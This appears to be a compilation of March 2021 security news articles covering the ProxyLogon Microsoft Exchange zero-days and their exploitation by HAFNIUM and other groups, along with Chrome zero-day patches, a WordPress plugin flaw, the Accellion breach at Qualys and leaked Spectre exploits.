Exploitation activity for the recently patched Exchange flaws continue to skyrocket, with researchers this week warning the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.

New research by Check Point Software said in the past 24 hours alone, the number of exploitation attempts on organizations have doubled every two to three hours.

Researchers said they saw hundreds of exploit attempts against organizations worldwide – with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).

Researchers warned that exploitation activity will continue — and urged companies that have not already done so to patch.

“Since the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,” according to Check Point researchers. “Global experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.”

WSJ: Microsoft Probing Possible PoC Exploit Code Leak
13.3.2021 Exploit  Securityweek

Software giant Microsoft Corp. has launched an investigation to determine whether one of its flagship information-sharing programs sprung a leak that led to the widespread exploitation of Exchange server deployments around the world.

According to a bombshell report in the Wall Street Journal, Redmond is looking closely at its Microsoft Active Protections Program (MAPP) to figure out if an anti-malware partner in China leaked proof-of-concept code ahead of the availability of security updates.

The MAPP program lets Microsoft share vulnerability data to give anti-malware, intrusion prevention/detection and corporate network security vendors a head-start to add signatures and filters to protect against Microsoft software vulnerabilities.

The program is popular with defenders but it has long been controversial because of there is legitimate risk that data on serious, unpatched vulnerabilities could land in the wrong hands.

In 2012, Microsoft dropped a Chinese vendor from the program after violations and there is rampant speculation that something similar happened in late February this year ahead of the Exchange Server patches.

The WSJ says Microsoft’s new investigation centers on the question of how a stealthy attack that began in early January picked up steam in the week before the company was able to send a software fix to customers.

From the WSJ article:

Some of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to “proof-of-concept” attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say. Microsoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.

One focus of the investigation has been an information-sharing program called the Microsoft Active Protections Program, which was created in 2008 to give security companies a head start in detecting emerging threats. Mapp includes about 80 security companies world-wide, about 10 of which are based in China. A subset of the Mapp partners were sent the Feb. 23 Microsoft notification, which included the proof-of-concept code, according to sources familiar with the program.

The report said Microsoft declined to say whether any Chinese companies were included in this release.

Microsoft’s probe comes amidst news that ransomware gangs are starting to take aim at the Exchange Server vulnerabilities, adding a new sense of urgency to the need for organization to apply patches and disinfect backdoors from networks.

Another Google Chrome 0-Day Bug Found Actively Exploited In-the-Wild
13.3.2021 Exploit  Thehackernews

Google has addressed yet another actively exploited zero-day in Chrome browser, marking the second such fix released by the company within a month.

The browser maker on Friday shipped 89.0.4389.90 for Windows, Mac, and Linux, which is expected to be rolling out over the coming days/weeks to all users.

While the update contains a total of five security fixes, the most important flaw rectified by Google concerns a use after free vulnerability in its Blink rendering engine. The bug is tracked as CVE-2021-21193.

Details about the flaw are scarce except that it was reported to Google by an anonymous researcher on March 9.

As is usually the case with actively exploited flaws, Google issued a terse statement acknowledging that an exploit for CVE-2021-21193 existed but refrained from sharing additional information until a majority of users are updated with the fixes and prevent other threat actors from creating exploits targeting this zero-day.

"Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild," Chrome Technical Program Manager Prudhvikumar Bommana noted in a blog post.

With this update, Google has fixed three zero-day flaws in Chrome since the start of the year.

Earlier this month, the company issued a fix for an "object lifecycle issue in audio" (CVE-2021-21166) which it said was being actively exploited. Then on February 4, the company resolved another actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.

Chrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.

Expert publishes PoC exploit code for Microsoft Exchange flaws
12.3.2021 Exploit  Securityaffairs

This week a security researcher published on GitHub a proof-of-concept tool to hack Microsoft Exchange servers chaining two of ProxyLogon flaws.
On March 2nd, Microsoft has released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported Microsoft Exchange versions that are actively exploited in the wild.

The IT giant reported that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers to access email accounts, and install backdoors to maintain access to victim environments. According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations.

This week, the independent security researcher Nguyen Jang published on GitHub a proof-of-concept tool to hack Microsoft Exchange servers. The tool chains two of the ProxyLogon vulnerabilities recently addressed by Microsoft.
The availability of the proof-of-concept code was first reported by The Record.

“A Vietnamese security researcher has published today the first functional public proof-of-concept exploit for a group of vulnerabilities in Microsoft Exchange servers known as ProxyLogon, and which have been under heavy exploitation for the past week.” reads the post published by The Record. “The proof-of-concept code was published on GitHub earlier today. A technical write-up (in Vietnamese) is also available on blogging platform Medium.”

The availability of the exploit online was immediately noticed by several cyber security experts, including Marcus Hutchins.

A few hours after the publication, GitHub took down the PoC hacking tool because it posed a threat to Microsoft’s customers using the Microsoft Exchange solution.

“We understand that the publication and distribution of proof of concept exploit code has educational and research value to the security community, and our goal is to balance that benefit with keeping the broader ecosystem safe,” the spokesperson said in an email sent to the Vice.. “In accordance with our Acceptable Use Policies, we disabled the gist following reports that it contains proof of concept code for a recently disclosed vulnerability that is being actively exploited.”

Jang explained that he has published the PoC code to raise the alert on the recent wave of hacks and give the opportunity to colleagues to study the code use in the attacks.
Experts at Praetorian published a detailed technical analysis of the exploit for the Microsoft Exchange flaws, they performed a reverse-engineering of the CVE-2021-26855 patch and developed a fully functioning end-to-end exploit
Also in this case, experts claim that technical analysis shared by the researchers could further speed up the development of a working exploit.

Hackers stole data from Norway parliament exploiting Microsoft Exchange flaws
12.3.2021 Exploit  Securityaffairs

Norway parliament, the Storting, has suffered a new cyberattack, hackers stole data by exploiting recently disclosed Microsoft Exchange vulnerabilities.
Norway ‘s parliament, the Storting, was hit by a new cyberattack, threat actors stole data exploiting the recently disclosed vulnerabilities in Microsoft Exchange, collectively tracked as ProxyLogon.

norway Health South East RHF
On March 2nd, Microsoft has released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported Microsoft Exchange versions that are actively exploited in the wild.

The IT giant reported that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers to access email accounts, and install backdoors to maintain access to victim environments. According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations.

“The Storting has again been hit by an IT attack. The attack is linked to vulnerabilities in Microsoft Exchange, which affected several businesses.” reads a statement issued by the Storting.

“The Storting does not yet know the full extent of the attack. A number of measures have been implemented in our systems, and the analysis work is ongoing. The Storting has received confirmation that data has been extracted,”

Storting director Marianne Andreassen confirmed that the data breach.

“We know that data has been extracted, but we do not yet have a full overview of the situation. We have implemented comprehensive measures and cannot rule out that it will be implemented further.” said Andreassen.

“The work takes place in collaboration with the security authorities. The situation is currently unclear, and we do not know the full potential for damage.”

This isn’t the first time that Storting was hit by a cyber attack, in August 2020 the authorities announced that Norway ‘s Parliament was the target of a major attack that allowed hackers to access emails and data of a small number of parliamentary representatives and employees. Norway‘s government blamed Russia for the cyberattack.

At the time of this writing, it is not possible to attribute the recent attack to a specific threat actor. Security experts observed Hafnium wasn’t the unique APT group exploiting Microsoft Exchange vulnerabilities in his attacks.

ESET researchers pointed out that other threat actors, such as cybercrime Tick, LuckyMouse, and Calypso, had also been exploiting the ProxyLogon flaws before Microsoft addressed them.

ProxyLogon PoC Exploit Released; Likely to Fuel More Disruptive Cyber Attacks
12.3.2021 Exploit  Thehackernews

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) on Wednesday issued a joint advisory warning of active exploitation of vulnerabilities in Microsoft Exchange on-premises products by nation-state actors and cybercriminals.

"CISA and FBI assess that adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack," the agencies said. "Adversaries may also sell access to compromised networks on the dark web."

The attacks have primarily targeted local governments, academic institutions, non-governmental organizations, and business entities in various industry sectors, including agriculture, biotechnology, aerospace, defense, legal services, power utilities, and pharmaceutical, which the agencies say are in line with previous activity conducted by Chinese cyber actors.

Tens of thousands of entities, including the European Banking Authority and the Norwegian Parliament, are believed to have been breached to install a web-based backdoor called the China Chopper web shell that grants the attackers the ability to plunder email inboxes and remotely access the target systems.

The development comes in light of the rapid expansion of attacks aimed at vulnerable Exchange Servers, with multiple threat actors exploiting the vulnerabilities as early as February 27 before they were eventually patched by Microsoft last week, swiftly turning what was labeled as "limited and targeted" into an indiscriminate mass exploitation campaign.

While there is no concrete explanation for the widespread exploitation by so many different groups, speculations are that the adversaries shared or sold exploit code, resulting in other groups being able to abuse these vulnerabilities, or that the groups obtained the exploit from a common seller.

From RCE to Web Shells to Implants
On March 2, 2021, Volexity publicly disclosed the detection of multiple zero-day exploits used to target flaws in on-premises versions of Microsoft Exchange Servers, while pegging the earliest in-the-wild exploitation activity on January 3, 2021.

Successful weaponization of these flaws, called ProxyLogon, allows an attacker to access victims' Exchange Servers, enabling them to gain persistent system access and control of an enterprise network.

Although Microsoft initially pinned the intrusions on Hafnium, a threat group that's assessed to be state-sponsored and operating out of China, Slovakian cybersecurity firm ESET on Wednesday said it identified no fewer than 10 different threat actors that likely took advantage of the remote code execution flaws to install malicious implants on victims' email servers.

Apart from Hafnium, the five groups detected as exploiting the vulnerabilities prior to the patch release are Tick, LuckyMouse, Calypso, Websiic, and Winnti (aka APT41 or Barium), with five others (Tonto Team, ShadowPad, "Opera" Cobalt Strike, Mikroceen, and DLTMiner) scanning and compromising Exchange servers in the days immediately following the release of the fixes.

No conclusive evidence has emerged so far connecting the campaign to China, but Domain Tools' Senior Security Researcher Joe Slowik noted that several of the aforementioned groups have been formerly linked to China-sponsored activity, including Tick, LuckyMouse, Calypso, Tonto Team, Mikroceen, and the Winnti Group, indicating that Chinese entities other than Hafnium are tied to the Exchange exploitation activity.

"It seems clear that there are numerous clusters of groups leveraging these vulnerabilities, the groups are using mass scanning or services that allow them to independently target the same systems, and finally there are multiple variations of the code being dropped, which may be indicative of iterations to the attack," Palo Alto Networks' Unit 42 threat intelligence team said.

In one cluster tracked as "Sapphire Pigeon" by researchers from U.S.-based Red Canary, attackers dropped multiple web shells on some victims at different times, some of which were deployed days before they conducted follow-on activity.

According to ESET's telemetry analysis, more than 5,000 email servers belonging to businesses and governments from over 115 countries are said to have been affected by malicious activity related to the incident. For its part, the Dutch Institute for Vulnerability Disclosure (DIVD) reported Tuesday that it found 46,000 servers out of 260,000 globally that were unpatched against the heavily exploited ProxyLogon vulnerabilities.

Troublingly, evidence points to the fact that the deployment of the web shells ramped up following the availability of the patch on March 2, raising the possibility that additional entities have opportunistically jumped in to create exploits by reverse engineering Microsoft updates as part of multiple, independent campaigns.

"The day after the release of the patches, we started to observe many more threat actors scanning and compromising Exchange servers en masse," said ESET researcher Matthieu Faou. "Interestingly, all of them are APT groups focused on espionage, except one outlier that seems related to a known coin-mining campaign (DLTminer). It is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later."

Aside from installing the web shell, other behaviors related to or inspired by Hafnium activity include conducting reconnaissance in victim environments by deploying batch scripts that automate several functions such as account enumeration, credential-harvesting, and network discovery.

Public Proof-of-Concept Available
Complicating the situation further is the availability of what appears to be the first functional public proof-of-concept (PoC) exploit for the ProxyLogon flaws despite Microsoft's attempts to take down exploits published on GitHub over the past few days.

"I've confirmed there is a public PoC floating around for the full RCE exploit chain," security researcher Marcus Hutchins said. "It has a couple bugs but with some fixes I was able to get shell on my test box."

Also accompanying the PoC's release is a detailed technical write-up by Praetorian researchers, who reverse-engineered CVE-2021-26855 to build a fully functioning end-to-end exploit by identifying differences between the vulnerable and patched versions.

While the researchers deliberately decided to omit critical PoC components, the development has also raised concerns that the technical information could further accelerate the development of a working exploit, in turn triggering even more threat actors to launch their own attacks.

As the sprawling hack's timeline slowly crystallizes, what's clear is that the surge of breaches against Exchange Server appears to have happened in two phases, with Hafnium using the chain of vulnerabilities to stealthily attack targets in a limited fashion, before other hackers began driving the frenzied scanning activity starting February 27.

Cybersecurity journalist Brian Krebs attributed this to the prospect that "different cybercriminal groups somehow learned of Microsoft's plans to ship fixes for the Exchange flaws a week earlier than they'd hoped."

"The best advice to mitigate the vulnerabilities disclosed by Microsoft is to apply the relevant patches," Slowik said. "However, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities to counter existing intrusions."

Vulnerability That Allows Complete WordPress Site Takeover Exploited in the Wild
10.3.2021 Exploit  Securityweek

A critical vulnerability identified in The Plus Addons for Elementor WordPress plugin could be exploited to gain administrative privileges to a website. The zero-day has been exploited in the wild, the Wordfence team at WordPress security company Defiant warns.

With more than 30,000 installations to date, The Plus Addons for Elementor is a premium plugin that has been designed to add several widgets to be used with the popular WordPress website builder Elementor.

The identified issue, Wordfence explains, resides in one of the added widgets, which provides the ability to insert user login and registration forms to Elementor pages.

Because the functionality is not properly configured, an attacker can create a new administrative user account on the vulnerable site, or even to log in as an existing administrative user, the researchers reveal.

All users of The Plus Addons for Elementor plugin are advised to deactivate and remove the plugin until a fix has been delivered for this zero-day. All registration or login widgets added by the plugin should be removed, and registration on vulnerable sites disabled.

The researchers also note that the free version of the plugin, namely The Plus Addons for Elementor Lite, is not affected by the same vulnerability. Thus, users should switch to the free version instead, until the vulnerability is addressed.

“It should be noted that this vulnerability can still be exploited even if you do not have an active login or registration page that was created with the plugin. This means that any site running this plugin is vulnerable to compromise,” Wordfence says.

The researchers also note that the vulnerability is currently being actively exploited. Thus, no further details on the issue are being released for the time being.

“We believe that attackers are adding user accounts with usernames as the registered email address based on how the vulnerability creates user accounts, and in some cases installing a malicious plugin labeled wpstaff. We strongly recommend checking your site for any unexpected administrative users or plugins you did not install,” Wordfence concludes.

The researchers have created a proof-of-concept and contacted the plugin’s developers, who are reportedly working on a patch.

Extortion Gang Breaches Cybersecurity Firm Qualys Using Accellion Exploit
5.3.2021 Exploit  Thehackernews

Enterprise cloud security firm Qualys has become the latest victim to join a long list of entities to have suffered a data breach after zero-day vulnerabilities in its Accellion File Transfer Appliance (FTA) server were exploited to steal sensitive business documents.

As proof of access to the data, the cybercriminals behind the recent hacks targeting Accellion FTA servers have shared screenshots of files belonging to the company's customers on a publicly accessible data leak website operated by the CLOP ransomware gang.

Confirming the incident, Qualys Chief Information Security Officer Ben Carr said a detailed probe "identified unauthorized access to files hosted on the Accellion FTA server" located in a DMZ (aka demilitarized zone) environment that's segregated from the rest of the internal network.

"Based on this investigation, we immediately notified the limited number of customers impacted by this unauthorized access," Carr added. "The investigation confirmed that the unauthorized access was limited to the FTA server and did not impact any services provided or access to customer data hosted by the Qualys Cloud Platform."

Last month, FireEye's Mandiant threat intelligence team disclosed details of four zero-day flaws in the FTA application that were exploited by threat actors to mount a wide-ranging data theft and extortion campaign, which involved deploying a web shell called DEWMODE on target networks to exfiltrate sensitive data, followed by sending extortion emails to threaten victims into paying bitcoin ransoms, failing which the stolen data was posted on the data leak site.

While two of the flaws (CVE-2021-27101 and CVE-2021-27104) were addressed by Accellion on December 20, 2020, the other two vulnerabilities (CVE-2021-27102 and CVE-2021-27103) were identified and fixed earlier this year on January 25.

Qualys said it received an "integrity alert" suggesting a possible compromise on December 24, two days after it applied the initial hotfix on December 22. The company didn't say if it received extortion messages in the wake of the breach, but said an investigation into the incident is ongoing.

"The exploited vulnerabilities were of critical severity because they were subject to exploitation via unauthenticated remote code execution," Mandiant said in a security assessment of the FTA software published earlier this week.

Additionally, Mandiant's source code analysis uncovered two more previously unknown security flaws in the FTA software, both of which have been rectified in a patch (version 9.12.444) released on March 1 —

CVE-2021-27730: An argument injection vulnerability (CVSS score 6.6) accessible only to authenticated users with administrative privileges, and
CVE-2021-27731: A stored cross-site scripting flaw (CVSS score 8.1) accessible only to regular authenticated users
The FireEye-owned subsidiary is tracking the exploitation activity and the follow-on extortion scheme under two separate threat clusters it calls UNC2546 and UNC2582, respectively, with overlaps identified between the two groups and previous attacks carried out by a financially motivated threat actor dubbed FIN11. But it is still unclear what connection, if any, the two clusters may have with the operators of Clop ransomware.

Google Patches Actively-Exploited Flaw in Chrome Browser

4.3.2021 Exploit  Threatpost

A flaw (CVE-2021-21166) in the Audio component of Google Chrome is fixed in a new update being pushed out to Windows, Mac and Linux users.

Google has fixed a high-severity vulnerability in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the flaw.

The vulnerability is one of 47 security fixes that the tech giant rolled out on Tuesday in Chrome 89.0.4389.72, including patches for eight high-severity flaws.

“The Chrome team is delighted to announce the promotion of Chrome 89 to the stable channel for Windows, Mac and Linux,” according to Google on Tuesday. “This will roll out over the coming days/weeks.”

Google Chrome: Actively-Exploited Security Flaw
The actively-exploited vulnerability in question (CVE-2021-21166) stems from the audio component of the browser (which has previously been found to have various security issues in the past). According to Google, the flaw stems from an object lifecycle issue. The object lifecycle is the duration in which a programming language object is valid for use – between the time it is created and destroyed.

Beyond Google noting that it “is aware of reports that an exploit for CVE-2021-21166 exists in the wild,” further information about the glitch is unavailable. That’s because “access to bug details and links may be kept restricted until a majority of users are updated with a fix,” according to Google.

The flaw was reported by Alison Huffman, with the Microsoft Browser Vulnerability Research team, on Feb. 11. Huffman reported another high-severity flaw that Google fixed in Chrome, which also stemmed from an object lifecycle issue in the audio component (CVE-2021-21165).

Other Chrome Security High-Severity Flaws
Details around the other high-severity vulnerabilities patched by Google in Chrome remain scant. However, Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC.

Two other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).

Google Chrome Security Updates
Chrome will in many cases update to its newest version automatically, however security experts suggest that users double check that this has happened. To check if an update is available:

Google Chrome users can go to chrome://settings/help by clicking Settings > About Chrome
If an update is available Chrome will notify users and then start the download process
Users can then relaunch the browser to complete the update
The fixes come after Google in February warned of a zero-day vulnerability in its V8 open-source web engine that’s being actively exploited by attackers. In January, the Cybersecurity and Infrastructure Security Agency (CISA) urged Windows, macOS and Linux users of Google’s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software.

And in December, Google updated Chrome to fix four bugs with a severity rating of “high” and eight overall. Three were use-after-free flaws, which could allow an adversary to generate an error in the browser’s memory, opening the door to a browser hack and host computer compromise.

Chrome 89 Patches Actively Exploited Vulnerability
4.3.2021 Exploit  Securityweek

Google this week announced the availability of Chrome 89 in the stable channel, with patches for a total of 47 vulnerabilities, including one that has been exploited in the wild.

Tracked as CVE-2021-21166, the zero-day security hole is described as a high-severity “object lifecycle issue in audio.” The bug was reported by Alison Huffman of Microsoft Browser Vulnerability Research, and is the second of this type addressed in Chrome 89, alongside CVE-2021-21165, also rated high risk.

“Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild,” the Internet giant notes, without providing further details on exploitation, impact, or attack vectors.

The bug is only one of the 32 flaws that were reported by external researchers and patched with the release of Chrome 89. These include 8 issues rated high severity, 15 considered medium severity, and 9 that have a low severity rating.

The remaining 6 high-severity issues include heap buffer overflows in TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160), a use-after-free in WebRTC (CVE-2021-21162), and insufficient data validation in Reader Mode (CVE-2021-21163) and Chrome for iOS (CVE-2021-21164).

Medium-severity flaws patched with this release include use-after-free bugs in bookmarks, Network Internals, and tab search; insufficient policy enforcement in appcache, File System API, and Autofill; out-of-bounds memory access in V8; incorrect security UI in Loader and TabStrip and Navigation; side-channel information leakage in Network Internals and autofill; inappropriate implementations in Referrer, Site isolation, full screen mode, and compositing; and a heap buffer overflow in OpenJPEG.

The low-risk bugs addressed with this browser update include insufficient policy enforcements, inappropriate implementation, insufficient data validation, use-after-free, and uninitialized use issues.

Google says it has paid more than $60,000 in bug bounty rewards to the reporting researchers. However, the company has yet to disclose the bounty rewards paid for approximately half of the externally reported vulnerabilities.

CVE-2021-21166 is the second zero-day addressed in Chrome this year. In early February, Google released patches for another high-severity flaw exploited in the wild, namely CVE-2021-21148, a heap buffer overflow in V8.

Should You Be Concerned About the Recently Leaked Spectre Exploits?
4.3.2021 Exploit  Securityweek

A researcher revealed on Monday that some exploits for the notorious CPU vulnerability known as Spectre were uploaded recently to the VirusTotal malware analysis service. While some experts say this could increase the risk of exploitation for malicious purposes, others believe there is no reason for concern.

The Spectre and Meltdown vulnerabilities were disclosed in January 2018, when researchers warned that billions of devices powered by processors from Intel, AMD and other vendors were impacted. An attacker with access to the targeted system can exploit the flaws to obtain potentially sensitive data. Patches and mitigations have been released, but many devices likely remain vulnerable, including due to the impact of the patches on performance and the relatively low risk of exploitation in the wild.

Spectre exploit leakedIn a blog post titled Spectre exploits in the "wild", researcher Julien Voisin shared a brief analysis of a Spectre exploit for Linux that had been uploaded to VirusTotal in early February. The exploit attempts to leverage CVE-2017-5753 — this is one of the two CVEs assigned to the Spectre flaw — for privilege escalation. A Windows exploit was also found on VirusTotal.

An analysis of the exploits spotted by Voisin showed that they came from offensive security firm Immunity and they were part of its CANVAS product, which includes hundreds of exploits, an automated exploitation system, and an exploit development framework for pentesters and researchers.

The Spectre exploit was developed by Immunity in 2018, shortly after the existence of the Spectre and Meltdown vulnerabilities came to light. However, a copy of CANVAS containing more than 800 exploits, including the Spectre exploits, started emerging recently on hacker forums, which is likely how they ended up on VirusTotal.

Voisin noted that the exploit still had a zero detection rate on VirusTotal when he had blogged about it. At the time of writing, it’s detected by 27 of 63 engines on VirusTotal.

Some members of the cybersecurity community have raised concerns about the availability of what some people described as “weaponized Spectre exploits.”

“More than three years after the discovery and publication of the Spectre vulnerability, there are signs that it could be weaponized, not just a POC. This new discovery has increased the potential risk,” Tal Morgenstern, co-founder and CPO of vulnerability remediation orchestration firm Vulcan Cyber, said via email.

However, he added, “We still need to consider that this is a local exploit, where an attacker would need to gain remote access by other means, making this a multistep attack.”

Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, a San Francisco-based provider of digital risk protection solutions, also believes the wider availability of exploits could increase the risk posed by the flaws, particularly in the case of users with older and unpatched operating systems, but he also admitted that “the technical requirements of a threat actor are still significant.”

Moritz Lipp, one of the researchers who discovered the Spectre vulnerability, told SecurityWeek that he does not believe the wider availability of the exploits makes a big difference now, pointing out that there are some conditions for the exploit to work, including the SMAP CPU feature to be disabled and the presence of an older version of the Linux kernel.

Lipp also suggested that it wouldn’t have been difficult for threat actors to create such exploits for Spectre given the proof-of-concepts (PoCs) that have been made available by the team that discovered Spectre and by researchers who found other similar CPU vulnerabilities.

Voisin told SecurityWeek that he published his blog post “to show that Spectre is a credible vector, but it doesn't mean that everyone is able to write exploits for it.”

“Having a commercial-grade [exploit] shows that serious players have access to this kind of vectors,” the researcher explained. “It does increase a bit the chances of attacks of course, but only on the supported systems.”

He added that “there are better ways to escalate privileges on Linux, like the Baron Samedit exploit for sudo, or whatever privesc of the week on Windows.”

Four zero-days in Microsoft Exchange actively exploited in the wild
3.3.2021 Exploit  Securityaffairs

Microsoft released emergency out-of-band security updates for all supported Microsoft Exchange versions that fix four zero-day flaws.
Microsoft has released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported Microsoft Exchange versions that are actively exploited in the wild.

The IT giant reported that at least one China linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers to access email accounts, and install backdoors to maintain access to victim environments.

“Microsoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments.” reads the advisory published by Microsoft. “Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.”

The attack chain starts with an untrusted connection to Exchange server port 443.

The first zero-day, tracked as CVE-2021-26855, is a server-side request forgery (SSRF) vulnerability in Exchange that could be exploited by an attacker to authenticate as the Exchange server by sending arbitrary HTTP requests.

The second flaw, tracked as CVE-2021-26857, is an insecure deserialization vulnerability that resides in the Unified Messaging service. The flaw could be exploited by an attacker with administrative permission to run code as SYSTEM on the Exchange server.

The third vulnerability, tracked as CVE-2021-26858, is a post-authentication arbitrary file write vulnerability in Exchange.

The last flaw, tracked as CVE-2021-27065, is a post-authentication arbitrary file write vulnerability in Exchange.

According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations. The group historically launched cyber espionage campaigns aimed at US-based organizations in multiple industries, including law firms and infectious disease researchers.

In past campaigns, HAFNIUM attackers also interacted with victim Office 365 tenants.
“HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.” state Microsoft.

HAFNIUM has previously hacked internet-facing servers by exploiting vulnerabilities, and used legitimate open-source frameworks, like Covenant, for command and control. Once the attackers have gained access to a victim network, they typically exfiltrates data to file-sharing services like MEGA.

Tom Burt, Microsoft Corporate Vice President, explained that once gained access to a vulnerable Microsoft Exchange server, Hafnium hackers would use remote access to steal data from an organization’s network

“First, it would gain access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would create what’s called a web shell to control the compromised server remotely. Third, it would use that remote access – run from the U.S.-based private servers – to steal data from an organization’s network.” wrote Burt.

Administrators are urged to install these security updates immediately to protect their installs.

Microsoft published Indicators of Compromise (IoCs) for these attacks.

Microsoft: 4 Exchange Server Zero-Days Under Attack by Chinese Hacking Group
3.3.2021 Exploit  Securityweek

Microsoft Exchange Vulnerabilities

Microsoft late Tuesday raised the alarm after discovering Chinese cyber-espionage operators chaining multiple zero-day exploits to siphon e-mail data from corporate Microsoft Exchange servers.

Redmond's warning includes the release of emergency out-of-band patches for four distinct zero-day vulnerabilities that formed part of the threat actor's arsenal.

Microsoft pinned the blame on a sophisticated Chinese APT operator called HAFNIUM that operates from leased VPS (virtual private servers) in the United States.

HAFNIUM primarily targets entities in the U.S. across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

The company said its analysts assess with high confidence that HAFNIUM is state-sponsored and operating out of China, based on observed victimology, tactics and procedures.

In all, Microsoft said the attacker chained four zero-days into a malware cocktail targeting its Exchange Server (Outlook Web App) product. The vulnerabilities exposed Microsoft's customers to remote code excecution attacks, without requiring authentication.

Supply Chain Security Summit

"In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments," Microsoft said.

"We strongly urge customers to update on-premises systems immediately," the company urged.

Here are the raw details on the vulnerabilities being exploited in the wild.

* CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.

* CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.

* CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

* CVE-2021-27065 is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

Enterprise defenders can find additional techincal details in this blog post from the Microsoft Server team.

Microsoft said the attacks included three steps. First, the group gained access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise as someone who should have access. Second, the attackers created a web shell to control the compromised server remotely. That remote access was then used – run from the U.S.-based private servers – to steal data from an organization’s network.

In campaigns unrelated to this new batch of zero-day vulnerabilities, Microsoft said it found HAFNIUM interacting with victim Office 365 tenants. "While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments," the company explained.

The attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, Microsoft added.

Cybersecurity firm Volexity, which was credited by Microsoft for reporting different parts of the attack chain, has published a blog post with technical details and a video demonstrating exploitation in action, along with known attacker IP addresses connected to the attacks. Volexity said it detected anomalous activity from two of its customers’ Microsoft Exchange servers in January 2021, which led to discovery of the attacks.

URGENT — 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange
3.3.2021 Exploit  Securityweek
Microsoft Exchange
Microsoft has released emergency patches to address four previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.

Describing the attacks as "limited and targeted," Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.

The tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.

Discussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a "highly skilled and sophisticated actor" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.

